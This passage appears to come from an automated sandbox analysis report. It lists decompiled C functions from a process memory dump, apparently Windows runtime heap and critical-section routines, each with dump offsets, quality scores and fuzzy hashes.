                                                              				_push( *_t12 & 0x000000ff);
                                                              				return E04BDB640(E04BD9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                                                              			}














                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 54%
                                                              			E04BD927A(void* __ecx) {
                                                              				signed int _t11;
                                                              				void* _t14;
                                                              
                                                              				_t11 = L04BB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                                                              				if(_t11 != 0) {
                                                              					E04BDFA60(_t11, 0, 0x98);
                                                              					asm("movsd");
                                                              					asm("movsd");
                                                              					asm("movsd");
                                                              					asm("movsd");
                                                              					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                                                              					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                                                              					E04BD92C6(_t11, _t14);
                                                              				}
                                                              				return _t11;
                                                              			}






                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 36%
                                                              			E04C68CD6(intOrPtr __ecx) {
                                                              				signed int _v8;
                                                              				intOrPtr _v12;
                                                              				short _v38;
                                                              				char _v44;
                                                              				signed char* _t11;
                                                              				intOrPtr _t17;
                                                              				intOrPtr _t22;
                                                              				intOrPtr _t23;
                                                              				intOrPtr _t24;
                                                              				signed int _t25;
                                                              
                                                              				_v8 =  *0x4c8d360 ^ _t25;
                                                              				_v12 = __ecx;
                                                              				_v38 = 0x1c2d;
                                                              				if(E04BB7D50() == 0) {
                                                              					_t11 = 0x7ffe0386;
                                                              				} else {
                                                              					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              				}
                                                              				_push( &_v44);
                                                              				_push(0xffffffe4);
                                                              				_push(0x402);
                                                              				_push( *_t11 & 0x000000ff);
                                                              				return E04BDB640(E04BD9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                                              			}














                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 88%
                                                              			E04BB746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                                                              				signed int _t8;
                                                              				void* _t10;
                                                              				short* _t17;
                                                              				void* _t19;
                                                              				intOrPtr _t20;
                                                              				void* _t21;
                                                              
                                                              				_t20 = __esi;
                                                              				_t19 = __edi;
                                                              				_t17 = __ebx;
                                                              				if( *((char*)(_t21 - 0x25)) != 0) {
                                                              					if(__ecx == 0) {
                                                              						E04BAEB70(__ecx, 0x4c879a0);
                                                              					} else {
                                                              						asm("lock xadd [ecx], eax");
                                                              						if((_t8 | 0xffffffff) == 0) {
                                                              							_push( *((intOrPtr*)(__ecx + 4)));
                                                              							E04BD95D0();
                                                              							L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                                                              							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                                                              							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                                                              						}
                                                              					}
                                                              					L10:
                                                              				}
                                                              				_t10 = _t19 + _t19;
                                                              				if(_t20 >= _t10) {
                                                              					if(_t19 != 0) {
                                                              						 *_t17 = 0;
                                                              						return 0;
                                                              					}
                                                              				}
                                                              				return _t10;
                                                              				goto L10;
                                                              			}










                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04B94F2E(void* __ecx, char _a4) {
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				void* _t17;
                                                              				void* _t19;
                                                              				void* _t20;
                                                              				void* _t21;
                                                              
                                                              				_t18 = __ecx;
                                                              				_t21 = __ecx;
                                                              				if(__ecx == 0) {
                                                              					L6:
                                                              					__eflags = _a4;
                                                              					if(__eflags != 0) {
                                                              						L8:
                                                              						E04C688F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                                              						L9:
                                                              						return 0;
                                                              					}
                                                              					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                              					if(__eflags != 0) {
                                                              						goto L9;
                                                              					}
                                                              					goto L8;
                                                              				}
                                                              				_t18 = __ecx + 0x30;
                                                              				if(E04BBC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x4b71030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                              					goto L6;
                                                              				} else {
                                                              					return 1;
                                                              				}
                                                              			}










                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a81ae3dc1e3922135dc07e49bb3b78a3e9f750c0f1fead5cab6ae9de0581220b
                                                              • Instruction ID: ffe785707c78d08ac8ca2fe9f4ed190f8d3a4c2980932e68dc4874dcc9a9c066
                                                              • Opcode Fuzzy Hash: a81ae3dc1e3922135dc07e49bb3b78a3e9f750c0f1fead5cab6ae9de0581220b
                                                              • Instruction Fuzzy Hash: A5F0B4325396948FDB61EB18C940B22B7D4EB087B8F0444E4D50987533C724FC49C650
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 36%
                                                              			E04C68B58(intOrPtr __ecx) {
                                                              				signed int _v8;
                                                              				intOrPtr _v20;
                                                              				short _v46;
                                                              				char _v52;
                                                              				signed char* _t11;
                                                              				intOrPtr _t17;
                                                              				intOrPtr _t22;
                                                              				intOrPtr _t23;
                                                              				intOrPtr _t24;
                                                              				signed int _t25;
                                                              
                                                              				_v8 =  *0x4c8d360 ^ _t25;
                                                              				_v20 = __ecx;
                                                              				_v46 = 0x1c26;
                                                              				if(E04BB7D50() == 0) {
                                                              					_t11 = 0x7ffe0386;
                                                              				} else {
                                                              					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              				}
                                                              				_push( &_v52);
                                                              				_push(4);
                                                              				_push(0x402);
                                                              				_push( *_t11 & 0x000000ff);
                                                              				return E04BDB640(E04BD9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                                              			}














                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6ce6dea851577e14a1915c6bec42ff8e78c761a8c97c696304d8381019a20b14
                                                              • Instruction ID: e4f06df6d464d60986384957421fb17e95024dfff6faeeae528de0a08ff30cc3
                                                              • Opcode Fuzzy Hash: 6ce6dea851577e14a1915c6bec42ff8e78c761a8c97c696304d8381019a20b14
                                                              • Instruction Fuzzy Hash: 2AF082B0A05258ABEB14EBA8D946E7EB3B8EF44304F440499B906DB3C0FA74E900C794
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 79%
                                                              			E04B9F358(void* __ecx, signed int __edx) {
                                                              				char _v8;
                                                              				signed int _t9;
                                                              				void* _t20;
                                                              
                                                              				_push(__ecx);
                                                              				_t9 = 2;
                                                              				_t20 = 0;
                                                              				if(E04BCF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                                                              					_t20 = L04BB4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                              				}
                                                              				return _t20;
                                                              			}







                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                              • Instruction ID: d50e8514c7b5c16382f8ef9438bf3581cf17275252ecd3131d2bdf6b1b15f482
                                                              • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                              • Instruction Fuzzy Hash: 67E0DF32A40118BBDF31ABD99E05FBABBADEB88B60F0001E5B904D7190D574AE00C6D0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04BAFF60(intOrPtr _a4) {
                                                              				void* __ecx;
                                                              				void* __ebp;
                                                              				void* _t13;
                                                              				intOrPtr _t14;
                                                              				void* _t15;
                                                              				void* _t16;
                                                              				void* _t17;
                                                              
                                                              				_t14 = _a4;
                                                              				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x4b711a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                              					return E04C688F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                                                              				} else {
                                                              					return E04BB0050(_t14);
                                                              				}
                                                              			}











                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7613f1cb04b67d3e1badb80417b2fb194d6112bbd7b73c6fd623e004c55657c8
                                                              • Instruction ID: 1910ea8255e3d12ef22457cd2c253043573c855b9b8dfbef362c945dc1a89bf1
                                                              • Opcode Fuzzy Hash: 7613f1cb04b67d3e1badb80417b2fb194d6112bbd7b73c6fd623e004c55657c8
                                                              • Instruction Fuzzy Hash: FCE09AB120F2049EE734EB65D0E0FBA3798DB42665F198099E0084B501C622F8A0C256
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04C4D380(void* __ecx, void* __edx, intOrPtr _a4) {
                                                              				void* _t5;
                                                              
                                                              				if(_a4 != 0) {
                                                              					_t5 = L04B9E8B0(__ecx, _a4, 0xfff);
                                                              					L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                              					return _t5;
                                                              				}
                                                              				return 0xc000000d;
                                                              			}





                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                              • Instruction ID: 0b456629c0dc0e779597ba9a9409918dd85042dcf6a5d58388e5d23243d94052
                                                              • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                              • Instruction Fuzzy Hash: DEE0C231280244FBEF226E45CD00FB97B66DB807A4F104071FE095A6A0CA75FD91E6C4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04BCA185() {
                                                              				void* __ecx;
                                                              				intOrPtr* _t5;
                                                              
                                                              				if( *0x4c867e4 >= 0xa) {
                                                              					if(_t5 < 0x4c86800 || _t5 >= 0x4c86900) {
                                                              						return L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                                                              					} else {
                                                              						goto L1;
                                                              					}
                                                              				} else {
                                                              					L1:
                                                              					return E04BB0010(0x4c867e0, _t5);
                                                              				}
                                                              			}






                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8ba52e1a8dd9e7c48390e1567c0c6905e7bc778a7d4ed99b8e4875aa8091c4b0
                                                              • Instruction ID: b85e7ae5de526631cd4f9aaf3a060b976d545a78cc9febca8a571b1dda17fb94
                                                              • Opcode Fuzzy Hash: 8ba52e1a8dd9e7c48390e1567c0c6905e7bc778a7d4ed99b8e4875aa8091c4b0
                                                              • Instruction Fuzzy Hash: 8BD05EA13610485AF72D7720A994B363213EBC9B1CF304CCDF1875A9E0DEA4FCE49289
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04BC16E0(void* __edx, void* __eflags) {
                                                              				void* __ecx;
                                                              				void* _t3;
                                                              
                                                              				_t3 = E04BC1710(0x4c867e0);
                                                              				if(_t3 == 0) {
                                                              					_t6 =  *[fs:0x30];
                                                              					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                                                              						goto L1;
                                                              					} else {
                                                              						return L04BB4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                                                              					}
                                                              				} else {
                                                              					L1:
                                                              					return _t3;
                                                              				}
                                                              			}






                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7a30ebabc4e7b5d0a2a586e803f7df8a958405572e3d9477ca5d1170ffd7336a
                                                              • Instruction ID: 607bfc73515831ec5b35a39fc38402f9c69303d0a488cf9539443bc63a6c7627
                                                              • Opcode Fuzzy Hash: 7a30ebabc4e7b5d0a2a586e803f7df8a958405572e3d9477ca5d1170ffd7336a
                                                              • Instruction Fuzzy Hash: 90D0C77124154056FA2D5F199894B153256EB80B99F3800EDF10BA94D2CFB5FD92E898
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04BC35A1(void* __eax, void* __ebx, void* __ecx) {
                                                              				void* _t6;
                                                              				void* _t10;
                                                              				void* _t11;
                                                              
                                                              				_t10 = __ecx;
                                                              				_t6 = __eax;
                                                              				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                                                              					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                                                              				}
                                                              				if( *((char*)(_t11 - 0x1a)) != 0) {
                                                              					return E04BAEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                              				}
                                                              				return _t6;
                                                              			}







                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                              • Instruction ID: 96495ea97f6d28d311eac61e3d23a79d292c1032dc0a0dae51a6f84aa62e3194
                                                              • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                              • Instruction Fuzzy Hash: C8D0C9315561849EEB51AB50C2A876877F2FB0031CFD8B0ED984616952C33EAA5ED641
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04BAAAB0() {
                                                              				intOrPtr* _t4;
                                                              
                                                              				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                              				if(_t4 != 0) {
                                                              					if( *_t4 == 0) {
                                                              						goto L1;
                                                              					} else {
                                                              						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                                                              					}
                                                              				} else {
                                                              					L1:
                                                              					return 0x7ffe0030;
                                                              				}
                                                              			}





                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                              • Instruction ID: 9640a4c9161339b563d7847cc1ce48246fa42db42a81a24e42131f03aab6e555
                                                              • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                              • Instruction Fuzzy Hash: 05D0E935352A80CFD71ADF5DC954B1573A4FB48B44FC504D0E505CBB61E62CED55CA10
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04C1A537(intOrPtr _a4, intOrPtr _a8) {
                                                              
                                                              				return L04BB8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                                                              			}



                                                              0x04c1a553

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                              • Instruction ID: bba2a4f2750d0de2fc454b7d28f707d12d9f73c74311e5dca79f2f2827f936d6
                                                              • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                              • Instruction Fuzzy Hash: CBC01232080248BBCB127E81CC01F567B2AEB94B60F008410BA480A5608672E970EA84
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04B9DB40() {
                                                              				signed int* _t3;
                                                              				void* _t5;
                                                              
                                                              				_t3 = L04BB4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                                                              				if(_t3 == 0) {
                                                              					return 0;
                                                              				} else {
                                                              					 *_t3 =  *_t3 | 0x00000400;
                                                              					return _t3;
                                                              				}
                                                              			}






                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                              • Instruction ID: 748ae0d2498c971c1158ae1859b0a05922583939d04c44c82988160c1338c057
                                                              • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                              • Instruction Fuzzy Hash: 3EC08C30290A00AAEB221F20CD01B5036A4FB00B05F4400E06301DA0F0DBB8EC01EA00
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04B9AD30(intOrPtr _a4) {
                                                              
                                                              				return L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                              			}



                                                              0x04b9ad49

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                              • Instruction ID: f70cea4d75df3b70e0ce6febc4aedbabe294fd1005efedf5f1c54eac26bcfd0d
                                                              • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                              • Instruction Fuzzy Hash: 24C08C32080288BBC7126A46CD00F117B29E790B60F000020BA040A6618972E860D5C8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04BA76E2(void* __ecx) {
                                                              				void* _t5;
                                                              
                                                              				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                                                              					return L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                                              				}
                                                              				return _t5;
                                                              			}




                                                              0x04ba76e4
                                                              0x00000000
                                                              0x04ba76f8
                                                              0x04ba76fd

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                              • Instruction ID: 8327884e713576420eed6c6fb075d421bb05557375841200ad76a5cb0101e5ac
                                                              • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                              • Instruction Fuzzy Hash: F0C08C701491C05AEB2A6B0CCE20B303650EB08708F4C01DCAA410D4A1CBA8F826C288
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04BC36CC(void* __ecx) {
                                                              
                                                              				if(__ecx > 0x7fffffff) {
                                                              					return 0;
                                                              				} else {
                                                              					return L04BB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                                              				}
                                                              			}




                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                              • Instruction ID: b9310083b6937fdd165c47a414262510334dd824c24ea73f31fb6d647735b6b2
                                                              • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                              • Instruction Fuzzy Hash: 8CC09B75155840FBE7155F30CD51F657294F740A65FA407E87221495F1D579BC00D544
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04BB3A1C(intOrPtr _a4) {
                                                              				void* _t5;
                                                              
                                                              				return L04BB4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                              			}




                                                              0x04bb3a35

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                              • Instruction ID: 682ee58380c16d92387edaaeafc9bbbb625050417566588d6f4c39babf360470
                                                              • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                              • Instruction Fuzzy Hash: A4C08C32080648BBC7126E41DC00F117B29E790B60F000060B6040A5618572EC60D988
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04BB7D50() {
                                                              				intOrPtr* _t3;
                                                              
                                                              				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                              				if(_t3 != 0) {
                                                              					return  *_t3;
                                                              				} else {
                                                              					return _t3;
                                                              				}
                                                              			}





                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                              • Instruction ID: be4c5aa19dab2be5e2c0128d1b41d66dc342ae0a6f40ffce80ef4a7341cfb48a
                                                              • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                              • Instruction Fuzzy Hash: 78B092343019408FCF16DF18C080B6533E4FB84A80B8400D4E400CBA20D629E8009900
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 53%
                                                              			E04C2FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                              				void* _t7;
                                                              				intOrPtr _t9;
                                                              				intOrPtr _t10;
                                                              				intOrPtr* _t12;
                                                              				intOrPtr* _t13;
                                                              				intOrPtr _t14;
                                                              				intOrPtr* _t15;
                                                              
                                                              				_t13 = __edx;
                                                              				_push(_a4);
                                                              				_t14 =  *[fs:0x18];
                                                              				_t15 = _t12;
                                                              				_t7 = E04BDCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                              				_push(_t13);
                                                              				E04C25720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                              				_t9 =  *_t15;
                                                              				if(_t9 == 0xffffffff) {
                                                              					_t10 = 0;
                                                              				} else {
                                                              					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                              				}
                                                              				_push(_t10);
                                                              				_push(_t15);
                                                              				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                              				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                              				return E04C25720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                              			}











                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04C2FDFA
                                                              Strings
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04C2FE2B
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04C2FE01
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
